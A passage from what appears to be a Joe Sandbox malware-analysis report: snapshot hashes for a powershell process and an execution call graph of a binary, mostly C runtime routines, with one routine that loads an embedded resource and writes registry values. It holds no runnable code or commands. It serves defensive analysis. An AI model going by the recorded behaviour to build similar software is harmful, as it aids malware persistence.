                            • Source File: 00000008.00000002.304267128.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7fff7e3f0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ecb4ff1b49874d970d453b7ceec39969013571de528c9004a0961edd250be686
                            • Instruction ID: 268590972e05388e6afa8d95ed175979c9207527cfad1f25472a8ad52bc6ffa1
                            • Opcode Fuzzy Hash: ecb4ff1b49874d970d453b7ceec39969013571de528c9004a0961edd250be686
                            • Instruction Fuzzy Hash: 97E0E63541494C8F8B44EF18D4099E977E0FB68305F01425BF41ED7560DB31A554CBC2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:7.3%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:3.2%
                            Total number of Nodes:1430
                            Total number of Limit Nodes:14
                            execution_graph 6792 1400066e4 6793 14000671d 6792->6793 6795 1400066ee 6792->6795 6794 140006703 FreeLibrary 6794->6795 6795->6793 6795->6794 6855 140003324 6862 1400037b4 6855->6862 6859 14000333a 6860 1400037e8 __vcrt_uninitialize_locks DeleteCriticalSection 6859->6860 6861 140003331 6859->6861 6860->6861 6871 140003a98 6862->6871 6864 1400037cc 6865 14000332d 6864->6865 6866 1400037e8 __vcrt_uninitialize_locks DeleteCriticalSection 6864->6866 6865->6861 6867 140003748 6865->6867 6866->6865 6868 140003758 6867->6868 6869 140003a44 __vcrt_FlsSetValue 3 API calls 6868->6869 6870 140003771 __vcrt_uninitialize_ptd 6868->6870 6869->6870 6870->6859 6872 140003820 __vcrt_FlsSetValue 2 API calls 6871->6872 6873 140003ace 6872->6873 6874 140003ae3 InitializeCriticalSectionAndSpinCount 6873->6874 6875 140003ad8 6873->6875 6874->6875 6875->6864 6261 14000d1e6 6262 14000d1fe 6261->6262 6268 14000d269 6261->6268 6262->6268 6269 14000366c 6262->6269 6265 14000366c 19 API calls 6266 14000d260 6265->6266 6267 140005594 16 API calls 6266->6267 6267->6268 6275 140003688 6269->6275 6271 140003675 6272 14000367a 6271->6272 6273 140005614 16 API calls 6271->6273 6272->6265 6274 140003684 6273->6274 6276 1400036a0 __std_exception_copy _invalid_parameter_noinfo 6275->6276 6277 1400036a7 try_get_function 6275->6277 6276->6271 6277->6276 6283 140003a44 6277->6283 6279 1400036da 6279->6276 6280 140003701 6279->6280 6281 140003a44 __vcrt_FlsSetValue 3 API calls 6279->6281 6280->6276 6282 140003a44 __vcrt_FlsSetValue 3 API calls 6280->6282 6281->6280 6282->6276 6288 140003820 6283->6288 6286 140003a84 TlsSetValue 6287 140003a7c 6286->6287 6287->6279 6289 140003938 6288->6289 6292 140003863 try_get_function 6288->6292 6289->6286 6289->6287 6290 140003927 GetProcAddress 6290->6289 6291 14000391e FreeLibrary 6291->6290 6292->6289 6292->6290 6292->6291 6876 140006728 6878 140006730 6876->6878 6879 140006761 6878->6879 6880 14000675d 6878->6880 6882 140006520 6878->6882 6887 14000678c 6879->6887 6883 140006148 try_get_function 2 API calls 6882->6883 6884 140006556 6883->6884 6885 14000656b InitializeCriticalSectionAndSpinCount 6884->6885 6886 140006560 6884->6886 6885->6886 6886->6878 6888 1400067b7 6887->6888 6889 14000679a DeleteCriticalSection 6888->6889 6890 1400067bb 6888->6890 6889->6888 6890->6880 6781 1400054ac 6782 1400054dd 6781->6782 6783 1400054c5 6781->6783 6783->6782 6784 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6783->6784 6784->6782 6796 1400054ec 6797 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6796->6797 6798 1400054fc 6797->6798 6799 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6798->6799 6800 140005510 6799->6800 6801 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6800->6801 6802 140005524 6801->6802 6803 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6802->6803 6804 140005538 6803->6804 6984 140009b70 6985 140009b9d 6984->6985 6986 140006090 _set_errno_from_matherr 5 API calls 6985->6986 6988 140009bb2 6985->6988 6987 140009ba7 6986->6987 6989 140005f70 _invalid_parameter_noinfo 5 API calls 6987->6989 6990 140002080 _handle_error 6 API calls 6988->6990 6989->6988 6991 140009f0f 6990->6991 7021 14000d1b0 7024 14000428c 7021->7024 7023 14000d1c6 7025 140005c30 _invalid_parameter_noinfo 5 API calls 7024->7025 7026 1400042aa 7025->7026 7026->7023 6293 140009ff4 6294 14000a013 6293->6294 6295 14000a08c 6294->6295 6298 14000a023 6294->6298 6301 140002464 6295->6301 6299 140002080 _handle_error 6 API calls 6298->6299 6300 14000a082 6299->6300 6304 140002478 IsProcessorFeaturePresent 6301->6304 6305 14000248e 6304->6305 6310 140002514 RtlCaptureContext RtlLookupFunctionEntry 6305->6310 6308 14000235c __raise_securityfailure 2 API calls 6309 140002472 6308->6309 6311 140002544 RtlVirtualUnwind 6310->6311 6312 1400024a2 6310->6312 6311->6312 6312->6308 6891 140005934 6892 14000594e 6891->6892 6893 140005939 6891->6893 6897 140005954 6893->6897 6896 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6896->6892 6898 14000599e 6897->6898 6899 140005996 6897->6899 6901 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6898->6901 6900 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6899->6900 6900->6898 6902 1400059ab 6901->6902 6903 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6902->6903 6904 1400059b8 6903->6904 6905 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6904->6905 6906 1400059c5 6905->6906 6907 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6906->6907 6908 1400059d2 6907->6908 6909 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6908->6909 6910 1400059df 6909->6910 6911 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6910->6911 6912 1400059ec 6911->6912 6913 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6912->6913 6914 1400059f9 6913->6914 6915 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6914->6915 6916 140005a09 6915->6916 6917 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6916->6917 6918 140005a19 6917->6918 6923 140005804 6918->6923 6920 140005a2e 6928 14000577c 6920->6928 6922 140005946 6922->6896 6924 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6923->6924 6926 140005820 6924->6926 6925 140005850 6925->6920 6926->6925 6927 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6926->6927 6927->6925 6929 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6928->6929 6930 140005798 6929->6930 6931 140005a4c Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6930->6931 6932 1400057a6 6931->6932 6932->6922 6933 140004f34 6936 140004eb8 6933->6936 6935 140004f5d 6937 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6936->6937 6939 140004ed6 6937->6939 6938 140004f0f 6938->6935 6939->6938 6940 140008fe0 5 API calls 6939->6940 6940->6939 6992 140009774 6993 14000979e 6992->6993 6994 140006840 _invalid_parameter_noinfo 5 API calls 6993->6994 6995 1400097bd 6994->6995 6996 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6995->6996 6997 1400097cb 6996->6997 6998 140006840 _invalid_parameter_noinfo 5 API calls 6997->6998 7002 1400097f5 6997->7002 6999 1400097e7 6998->6999 7001 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6999->7001 7000 140006520 3 API calls 7000->7002 7001->7002 7002->7000 7003 1400097fe 7002->7003 6252 1400021b8 6260 140002cf4 SetUnhandledExceptionFilter 6252->6260 6461 140003a3c TlsGetValue 6462 14000e198 6461->6462 6805 140005cfc 6806 140005d0c 6805->6806 6807 140005d17 __vcrt_uninitialize_ptd 6806->6807 6808 140005c30 _invalid_parameter_noinfo 5 API calls 6806->6808 6808->6807 6809 1400022fc 6810 140002ca0 __scrt_is_managed_app GetModuleHandleW 6809->6810 6811 140002303 6810->6811 6313 14000c400 6314 14000c411 CloseHandle 6313->6314 6315 14000c417 6313->6315 6314->6315 6316 140002600 6319 1400031cc 6316->6319 6318 140002629 6320 1400031ed 6319->6320 6321 140003222 __std_exception_copy 6319->6321 6320->6321 6323 1400055b4 6320->6323 6321->6318 6324 1400055c1 6323->6324 6325 1400055cb 6323->6325 6324->6325 6330 1400055e6 6324->6330 6326 140006090 _set_errno_from_matherr 5 API calls 6325->6326 6327 1400055d2 6326->6327 6328 140005f70 _invalid_parameter_noinfo 5 API calls 6327->6328 6329 1400055de 6328->6329 6329->6321 6330->6329 6331 140006090 _set_errno_from_matherr 5 API calls 6330->6331 6331->6327 6812 140009902 6813 14000993e 6812->6813 6814 140009930 6812->6814 6814->6813 6815 14000405c 16 API calls 6814->6815 6816 14000995c 6815->6816 6817 14000996a 6816->6817 6818 14000998c 6816->6818 6828 14000b884 6817->6828 6818->6813 6831 14000b838 6818->6831 6822 140009a22 6825 140008008 MultiByteToWideChar 6822->6825 6823 1400099d0 6824 140009a05 6823->6824 6827 140008008 MultiByteToWideChar 6823->6827 6824->6813 6826 140006090 _set_errno_from_matherr 5 API calls 6824->6826 6825->6824 6826->6813 6827->6824 6834 14000bc18 6828->6834 6832 14000405c 16 API calls 6831->6832 6833 1400099cc 6832->6833 6833->6822 6833->6823 6836 14000bc75 6834->6836 6839 14000bc81 6834->6839 6835 140002080 _handle_error 6 API calls 6838 14000b897 6835->6838 6836->6835 6837 140006090 _set_errno_from_matherr 5 API calls 6837->6836 6838->6813 6839->6836 6839->6837 6547 140004c83 6548 140005594 16 API calls 6547->6548 6549 140004c88 6548->6549 6840 140002d04 6841 140002d38 6840->6841 6842 140002d1c 6840->6842 6842->6841 6849 1400033dc 6842->6849 6847 140005594 16 API calls 6848 140002d5e 6847->6848 6850 14000366c 19 API calls 6849->6850 6851 140002d4a 6850->6851 6852 1400033f0 6851->6852 6853 14000366c 19 API calls 6852->6853 6854 140002d56 6853->6854 6854->6847 6941 140002348 6944 1400029e8 6941->6944 6945 140002a0b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6944->6945 6946 140002351 6944->6946 6945->6946 6332 14000be0b 6333 14000be4b 6332->6333 6334 14000c0b0 6332->6334 6333->6334 6336 14000be7f 6333->6336 6337 14000c092 6333->6337 6335 14000c0a6 6334->6335 6339 14000c990 _log10_special 12 API calls 6334->6339 6340 14000c990 6337->6340 6339->6335 6343 14000c9b0 6340->6343 6344 14000c9ca 6343->6344 6345 14000c9ab 6344->6345 6347 14000c7f4 6344->6347 6345->6335 6348 14000c834 _handle_error 6347->6348 6350 14000c8a0 _handle_error 6348->6350 6358 14000cab0 6348->6358 6351 14000c8dd 6350->6351 6353 14000c8ad 6350->6353 6365 14000cde8 6351->6365 6361 14000c6d0 6353->6361 6355 14000c8db _handle_error 6356 140002080 _handle_error 6 API calls 6355->6356 6357 14000c905 6356->6357 6357->6345 6371 14000cad8 6358->6371 6362 14000c714 _handle_error 6361->6362 6363 14000c729 6362->6363 6364 14000cde8 _set_errno_from_matherr 5 API calls 6362->6364 6363->6355 6364->6363 6366 14000cdf1 6365->6366 6367 14000ce06 6365->6367 6368 14000cdfe 6366->6368 6370 140006090 _set_errno_from_matherr 5 API calls 6366->6370 6369 140006090 _set_errno_from_matherr 5 API calls 6367->6369 6368->6355 6369->6368 6370->6368 6372 14000cb17 _raise_exc _clrfp 6371->6372 6373 14000cd2c RaiseException 6372->6373 6374 14000cad2 6373->6374 6374->6350 7004 14000238b 7005 140002390 IsProcessorFeaturePresent 7004->7005 7006 1400023a7 7005->7006 7007 140002584 capture_previous_context 3 API calls 7006->7007 7008 1400023ba 7007->7008 7009 14000235c __raise_securityfailure 2 API calls 7008->7009 7010 14000245c 7009->7010 6463 14000484c 6464 140004861 6463->6464 6465 140004865 6463->6465 6466 140007c1c 25 API calls 6465->6466 6467 14000486a 6466->6467 6475 1400080fc GetEnvironmentStringsW 6467->6475 6470 140004877 6472 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6470->6472 6472->6464 6474 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6474->6470 6476 14000812a 6475->6476 6477 1400081cc 6475->6477 6480 140008064 WideCharToMultiByte 6476->6480 6478 1400081d6 FreeEnvironmentStringsW 6477->6478 6479 14000486f 6477->6479 6478->6479 6479->6470 6487 1400048b8 6479->6487 6481 14000817c 6480->6481 6481->6477 6482 1400067e0 5 API calls 6481->6482 6483 14000818b 6482->6483 6484 1400081b5 6483->6484 6485 140008064 WideCharToMultiByte 6483->6485 6486 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6484->6486 6485->6484 6486->6477 6488 1400048df 6487->6488 6489 140006840 _invalid_parameter_noinfo 5 API calls 6488->6489 6497 140004914 6489->6497 6490 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6491 140004884 6490->6491 6491->6474 6492 140006840 _invalid_parameter_noinfo 5 API calls 6492->6497 6493 140004974 6502 1400049c0 6493->6502 6495 1400055b4 __std_exception_copy 5 API calls 6495->6497 6497->6492 6497->6493 6497->6495 6499 1400049ab 6497->6499 6500 140004983 6497->6500 6501 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6497->6501 6498 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6498->6500 6500->6490 6501->6497 6503 1400049c5 6502->6503 6504 14000497c 6502->6504 6505 1400049ee 6503->6505 6506 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6503->6506 6504->6498 6507 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6505->6507 6506->6503 6507->6504 6788 14000a8cc 6789 140007c1c 25 API calls 6788->6789 6790 14000a8d5 6789->6790 6375 140006c10 6376 140006c36 6375->6376 6385 140006c4c 6375->6385 6377 140006090 _set_errno_from_matherr 5 API calls 6376->6377 6378 140006c3b 6377->6378 6380 140005f70 _invalid_parameter_noinfo 5 API calls 6378->6380 6379 140006cb9 6381 140004664 5 API calls 6379->6381 6391 140006c45 6380->6391 6382 140006d2c 6381->6382 6383 140006da1 6382->6383 6393 140006e04 6382->6393 6410 140009f20 6382->6410 6386 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6383->6386 6385->6379 6388 140006cac 6385->6388 6394 140006e1c 6385->6394 6386->6388 6387 140006de2 6390 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6387->6390 6388->6387 6389 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6388->6389 6389->6388 6390->6391 6395 140006e4a 6394->6395 6395->6395 6396 140006840 _invalid_parameter_noinfo 5 API calls 6395->6396 6397 140006e95 6396->6397 6398 140009f20 5 API calls 6397->6398 6399 140006ecb 6398->6399 6400 14000405c 16 API calls 6399->6400 6401 14000707f 6400->6401 6419 14000690c 6401->6419 6404 140007130 6405 14000405c 16 API calls 6404->6405 6406 140007163 6405->6406 6440 140006a84 6406->6440 6409 140006e1c 18 API calls 6413 140009f38 6410->6413 6411 140009f3d 6412 140006090 _set_errno_from_matherr 5 API calls 6411->6412 6415 140009f53 6411->6415 6418 140009f47 6412->6418 6413->6411 6413->6415 6416 140009f82 6413->6416 6414 140005f70 _invalid_parameter_noinfo 5 API calls 6414->6415 6415->6382 6416->6415 6417 140006090 _set_errno_from_matherr 5 API calls 6416->6417 6417->6418 6418->6414 6420 140006935 6419->6420 6421 140006957 6419->6421 6422 140006943 FindFirstFileExW 6420->6422 6425 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6420->6425 6423 14000695b 6421->6423 6424 1400069b0 6421->6424 6422->6404 6423->6422 6427 14000696f 6423->6427 6430 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6423->6430 6426 140008008 MultiByteToWideChar 6424->6426 6425->6422 6432 1400069cb 6426->6432 6428 1400067e0 5 API calls 6427->6428 6428->6422 6429 1400069d2 try_get_function 6429->6422 6436 140006020 5 API calls 6429->6436 6430->6427 6431 1400069ff 6435 1400067e0 5 API calls 6431->6435 6432->6429 6432->6431 6434 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6432->6434 6437 140006a0b 6432->6437 6433 140008008 MultiByteToWideChar 6433->6429 6434->6431 6435->6437 6438 1400069df 6436->6438 6437->6422 6437->6433 6439 140006090 _set_errno_from_matherr 5 API calls 6438->6439 6439->6422 6441 140006aad 6440->6441 6442 140006acf 6440->6442 6445 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6441->6445 6448 140006abb 6441->6448 6443 140006b28 6442->6443 6447 140006ad4 6442->6447 6444 140008064 WideCharToMultiByte 6443->6444 6455 140006b4c 6444->6455 6445->6448 6446 140006ae8 6451 1400067e0 5 API calls 6446->6451 6447->6446 6447->6448 6450 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6447->6450 6448->6409 6449 140006b53 try_get_function 6449->6448 6456 140006020 5 API calls 6449->6456 6450->6446 6451->6448 6452 140006b8e 6452->6448 6453 140008064 WideCharToMultiByte 6452->6453 6453->6449 6454 140006b83 6458 1400067e0 5 API calls 6454->6458 6455->6449 6455->6452 6455->6454 6457 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6455->6457 6459 140006b60 6456->6459 6457->6454 6458->6452 6460 140006090 _set_errno_from_matherr 5 API calls 6459->6460 6460->6448 5284 1400021d4 5307 1400027d4 5284->5307 5287 140002320 5362 140002b10 IsProcessorFeaturePresent 5287->5362 5288 1400021f0 __scrt_acquire_startup_lock 5290 14000232a 5288->5290 5298 14000220e __scrt_release_startup_lock 5288->5298 5291 140002b10 __scrt_fastfail 5 API calls 5290->5291 5293 140002335 5291->5293 5292 140002233 5294 1400022b9 5313 140002c5c 5294->5313 5296 1400022be 5316 140004a7c 5296->5316 5298->5292 5298->5294 5351 140004e30 5298->5351 5304 1400022e1 5304->5293 5358 140002968 5304->5358 5369 140002e04 5307->5369 5310 1400021e8 5310->5287 5310->5288 5311 140002803 __scrt_initialize_crt 5311->5310 5371 14000334c 5311->5371 5379 140003440 5313->5379 5381 140007c1c 5316->5381 5318 140004a8b 5319 1400022c6 5318->5319 5387 140007fcc 5318->5387 5321 140001000 5319->5321 5867 14000418c 5321->5867 5326 140001044 SizeofResource 5327 1400011a7 5326->5327 5328 14000105e LoadResource 5326->5328 5329 140002080 _handle_error 6 API calls 5327->5329 5328->5327 5330 140001072 LockResource RegOpenKeyExW 5328->5330 5331 1400011bb 5329->5331 5330->5327 5332 1400010ad RegSetValueExW 5330->5332 5356 140002ca0 GetModuleHandleW 5331->5356 5332->5327 5333 1400010d7 RegOpenKeyExW 5332->5333 5333->5327 5334 140001106 RegSetValueExW 5333->5334 5334->5327 5335 14000112c 5334->5335 5873 1400011d0 5335->5873 5338 1400011d0 87 API calls 5339 140001140 5338->5339 5995 140001fc0 CoInitialize 5339->5995 5344 140001175 5346 140001fc0 9 API calls 5344->5346 5347 140001181 5346->5347 5348 140001ce0 9 API calls 5347->5348 5349 140001197 5348->5349 5349->5327 5350 140001ee0 9 API calls 5349->5350 5350->5327 5352 140004e54 5351->5352 5353 140004e66 5351->5353 5352->5294 6203 140005594 5353->6203 5357 140002cb1 5356->5357 5357->5304 5360 140002979 5358->5360 5359 1400022f8 5359->5292 5360->5359 5361 14000334c __scrt_initialize_crt DeleteCriticalSection 5360->5361 5361->5359 5363 140002b35 __scrt_fastfail 5362->5363 5364 140002b54 RtlCaptureContext RtlLookupFunctionEntry 5363->5364 5365 140002b7d RtlVirtualUnwind 5364->5365 5366 140002bb9 __scrt_fastfail 5364->5366 5365->5366 5367 140002c2e UnhandledExceptionFilter 5366->5367 5368 140002c3d __scrt_fastfail 5367->5368 5368->5290 5370 1400027f6 __scrt_dllmain_crt_thread_attach 5369->5370 5370->5310 5370->5311 5372 140003354 __vcrt_uninitialize_ptd 5371->5372 5373 14000335e 5371->5373 5375 1400037e8 5372->5375 5373->5310 5376 140003813 5375->5376 5377 1400037f6 DeleteCriticalSection 5376->5377 5378 140003817 5376->5378 5377->5376 5378->5373 5380 140002c73 GetStartupInfoW 5379->5380 5380->5296 5382 140007c6e 5381->5382 5383 140007c29 5381->5383 5382->5318 5391 140005b88 5383->5391 5388 140007f54 5387->5388 5389 14000405c 16 API calls 5388->5389 5390 140007f78 5389->5390 5390->5318 5393 140005b99 5391->5393 5397 140005ba6 5393->5397 5432 140006484 5393->5432 5394 140005bbd 5394->5397 5437 140006840 5394->5437 5402 140005c20 5397->5402 5453 140005614 5397->5453 5400 140005bee 5404 140006484 _invalid_parameter_noinfo 3 API calls 5400->5404 5401 140005bde 5403 140006484 _invalid_parameter_noinfo 3 API calls 5401->5403 5414 1400079a0 5402->5414 5406 140005be5 5403->5406 5405 140005bf6 5404->5405 5407 140005bfa 5405->5407 5408 140005c0c 5405->5408 5443 1400068b8 5406->5443 5409 140006484 _invalid_parameter_noinfo 3 API calls 5407->5409 5448 140005864 5408->5448 5409->5406 5413 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5413->5397 5708 140007b64 5414->5708 5416 1400079c9 5721 1400076ac 5416->5721 5420 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5423 1400079e3 5420->5423 5423->5382 5425 140007a8a 5426 140006090 _set_errno_from_matherr 5 API calls 5425->5426 5431 140007a8f 5426->5431 5427 140007aec 5427->5431 5745 1400074f0 5427->5745 5428 140007aaf 5428->5427 5429 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5428->5429 5429->5427 5431->5420 5462 140006148 5432->5462 5434 1400064b2 5435 1400064c4 TlsSetValue 5434->5435 5436 1400064bc 5434->5436 5435->5436 5436->5394 5441 140006851 _invalid_parameter_noinfo 5437->5441 5438 1400068a2 5471 140006090 5438->5471 5440 140005bd0 5440->5400 5440->5401 5441->5438 5441->5440 5468 140004220 5441->5468 5444 1400068bd HeapFree 5443->5444 5447 1400068dd Concurrency::details::SchedulerProxy::DeleteThis try_get_function 5443->5447 5445 1400068d8 5444->5445 5444->5447 5446 140006090 _set_errno_from_matherr 4 API calls 5445->5446 5446->5447 5447->5397 5499 14000573c 5448->5499 5450 140005916 5502 1400057bc 5450->5502 5452 14000592b 5452->5413 5623 14000920c 5453->5623 5456 14000562c 5457 140005635 IsProcessorFeaturePresent 5456->5457 5458 14000565f 5456->5458 5460 140005644 5457->5460 5644 140005d5c 5460->5644 5463 1400061a9 5462->5463 5465 1400061a4 try_get_function 5462->5465 5463->5434 5464 14000628c 5464->5463 5466 14000629a GetProcAddress 5464->5466 5465->5463 5465->5464 5467 140006271 FreeLibrary 5465->5467 5466->5463 5467->5465 5474 140004250 5468->5474 5479 140005c30 5471->5479 5473 140006099 5473->5440 5477 140006770 EnterCriticalSection 5474->5477 5478 14000e0f5 5477->5478 5481 140005c45 try_get_function 5479->5481 5480 140006484 _invalid_parameter_noinfo 3 API calls 5482 140005c7a 5480->5482 5481->5480 5487 140005c5f _invalid_parameter_noinfo 5481->5487 5483 140006840 _invalid_parameter_noinfo 5 API calls 5482->5483 5482->5487 5484 140005c8d 5483->5484 5485 140005cab 5484->5485 5486 140005c9b 5484->5486 5489 140006484 _invalid_parameter_noinfo 3 API calls 5485->5489 5488 140006484 _invalid_parameter_noinfo 3 API calls 5486->5488 5487->5473 5496 140005ca2 5488->5496 5490 140005cb3 5489->5490 5491 140005cb7 5490->5491 5492 140005cc9 5490->5492 5493 140006484 _invalid_parameter_noinfo 3 API calls 5491->5493 5494 140005864 _invalid_parameter_noinfo 5 API calls 5492->5494 5493->5496 5497 140005cd1 5494->5497 5495 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5495->5487 5496->5495 5498 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5497->5498 5498->5487 5500 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5499->5500 5501 140005758 5500->5501 5501->5450 5503 140006770 Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 5502->5503 5504 1400057d8 5503->5504 5507 140005a4c 5504->5507 5506 1400057ee 5506->5452 5508 140005a94 Concurrency::details::SchedulerProxy::DeleteThis 5507->5508 5509 140005a68 Concurrency::details::SchedulerProxy::DeleteThis 5507->5509 5508->5506 5509->5508 5511 140008ccc 5509->5511 5512 140008d68 5511->5512 5515 140008cef 5511->5515 5513 140008dbb 5512->5513 5516 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5512->5516 5577 140008e6c 5513->5577 5515->5512 5517 140008d2e 5515->5517 5521 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5515->5521 5518 140008d8c 5516->5518 5520 140008d50 5517->5520 5527 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5517->5527 5519 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5518->5519 5522 140008da0 5519->5522 5523 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5520->5523 5525 140008d22 5521->5525 5526 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5522->5526 5529 140008d5c 5523->5529 5524 140008dc7 5528 140008e26 5524->5528 5530 1400068b8 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 5524->5530 5537 1400087d8 5525->5537 5532 140008daf 5526->5532 5533 140008d44 5527->5533 5534 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5529->5534 5530->5524 5535 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5532->5535 5565 1400088e4 5533->5565 5534->5512 5535->5513 5538 1400088dc 5537->5538 5539 1400087e1 5537->5539 5538->5517 5540 1400087fb 5539->5540 5541 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5539->5541 5542 14000880d 5540->5542 5544 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5540->5544 5541->5540 5543 14000881f 5542->5543 5545 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5542->5545 5546 140008831 5543->5546 5547 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5543->5547 5544->5542 5545->5543 5548 140008843 5546->5548 5549 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5546->5549 5547->5546 5550 140008855 5548->5550 5551 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5548->5551 5549->5548 5552 140008867 5550->5552 5554 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5550->5554 5551->5550 5553 140008879 5552->5553 5555 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5552->5555 5556 14000888b 5553->5556 5557 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5553->5557 5554->5552 5555->5553 5558 14000889d 5556->5558 5559 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5556->5559 5557->5556 5560 1400088b2 5558->5560 5561 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5558->5561 5559->5558 5562 1400088c7 5560->5562 5563 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5560->5563 5561->5560 5562->5538 5564 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5562->5564 5563->5562 5564->5538 5567 1400088e9 5565->5567 5575 14000894a 5565->5575 5566 140008902 5569 140008914 5566->5569 5571 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5566->5571 5567->5566 5568 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5567->5568 5568->5566 5570 140008926 5569->5570 5572 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5569->5572 5573 140008938 5570->5573 5574 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5570->5574 5571->5569 5572->5570 5573->5575 5576 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5573->5576 5574->5573 5575->5520 5576->5575 5578 140008e9c 5577->5578 5579 140008e71 5577->5579 5578->5524 5579->5578 5583 1400089a8 5579->5583 5582 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5582->5578 5584 1400089b1 5583->5584 5585 140008aa0 5583->5585 5619 140008950 5584->5619 5585->5582 5588 140008950 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5589 1400089da 5588->5589 5590 140008950 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5589->5590 5591 1400089e8 5590->5591 5592 140008950 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5591->5592 5593 1400089f6 5592->5593 5594 140008950 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5593->5594 5595 140008a05 5594->5595 5596 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5595->5596 5597 140008a11 5596->5597 5598 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5597->5598 5599 140008a1d 5598->5599 5600 1400068b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 5599->5600 5601 140008a29 5600->5601 5602 140008950 